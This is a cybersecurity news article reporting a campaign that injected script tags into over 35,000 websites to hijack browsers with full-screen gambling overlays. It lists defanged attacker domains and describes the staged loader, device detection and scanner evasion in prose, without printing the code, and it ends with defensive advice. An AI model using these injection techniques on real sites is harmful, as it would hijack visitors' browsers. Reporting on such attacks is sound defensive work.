![[The AI Show Episode 142]: ChatGPT’s New Image Generator, Studio Ghibli Craze and Backlash, Gemini 2.5, OpenAI Academy, 4o Updates, Vibe Marketing & xAI Acquires X](https://www.marketingaiinstitute.com/hubfs/ep%20142%20cover.png)
![[FREE EBOOKS] The Kubernetes Bible, The Ultimate Linux Shell Scripting Guide & Four More Best Selling Titles](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From drop-out to software architect with Jason Lengstorf [Podcast #167]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743796461357/f3d19cd7-e6f5-4d7c-8bfc-eb974bc8da68.png?#)
.png?#)
.jpg?#)
_Christophe_Coat_Alamy.jpg?#)
![Rapidus in Talks With Apple as It Accelerates Toward 2nm Chip Production [Report]](https://www.iclarified.com/images/news/96937/96937/96937-640.jpg)
35,000+ Websites Hacked To Inject Malicious Scripts Redirecting Users To Chinese Websites
A massive cybersecurity breach has compromised over 35,000 websites, injecting malicious scripts that completely hijack users’ browser windows and redirect them to Chinese-language gambling platforms. The attack, identified on February 20th, 2025, appears to target regions where Mandarin is common, with the final landing pages promoting gambling content under the “Kaiyun” brand. Security researchers at […] The post 35,000+ Websites Hacked To Inject Malicious Scripts Redirecting Users To Chinese Websites appeared first on Cyber Security News.
A massive cybersecurity breach has compromised over 35,000 websites, injecting malicious scripts that completely hijack users’ browser windows and redirect them to Chinese-language gambling platforms.
The attack, identified on February 20th, 2025, appears to target regions where Mandarin is common, with the final landing pages promoting gambling content under the “Kaiyun” brand.
Security researchers at c/side have discovered that attackers place a simple one-line script tag in the affected websites’ source code, which then loads additional malicious code.
The initial infection begins with an injected script tag that references domains such as zuizhongjs[.]com, mlbetjs[.]com, ptfafajs[.]com, and others.
For example, the following code has been found injected into thousands of websites:-
.webp)
Once loaded, this initial script creates another script element to fetch additional malicious code from domains like deski.fastcloudcdn[.]com.
The primary payload is sophisticated, employing device detection techniques and implementing random delays between 500-1000 milliseconds to evade automated security scanning tools.
The most concerning aspect of this attack is the complete takeover of the browser window.
Researchers at c/side noted that the malicious script injects code that writes a full-screen iframe, effectively replacing the original website content with the attacker’s gambling platform.
The code creates a div element that spans the entire viewport and loads content from URLs like “https://www.zuizhongjs[.]com/go/kaiyun1/ky.html”.
.webp)
Infection Process
The attack operates through multiple stages of code execution. After the initial script is loaded, the attackers use JavaScript functions to detect the user’s device type, determining if they are on mobile devices or specific operating systems like iOS.
This allows for targeted delivery of the malicious content. For instance, the code includes functions like isMobile() and getIosVersion() to tailor the payload for specific devices.
The script then creates a meta viewport tag that ensures the malicious content fills the entire screen, making it impossible for users to access the original website.
The code snippet responsible for creating the fullscreen overlay includes document. Write statements that inject HTML and CSS to position an iframe absolutely over the entire page.
Some variants of the attack have been observed implementing region-based filtering, showing different content to users based on their IP address, with some seeing an access-blocked message instructing them to contact supposed support channels.
This sophisticated filtering mechanism may be designed to reduce exposure to security researchers or decrease unwanted traffic to the malicious domains.
Security experts suggest this campaign may be connected to the Megalayer exploit, known for distributing Chinese-language malware.
Website owners are advised to audit their source code for unauthorized script tags, block the malicious domains through firewall rules, regularly check for unauthorized file modifications, implement Content Security Policy restrictions, and perform frequent site scans using tools like PublicWWW or URLScan to uncover malicious injections.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
The post 35,000+ Websites Hacked To Inject Malicious Scripts Redirecting Users To Chinese Websites appeared first on Cyber Security News.
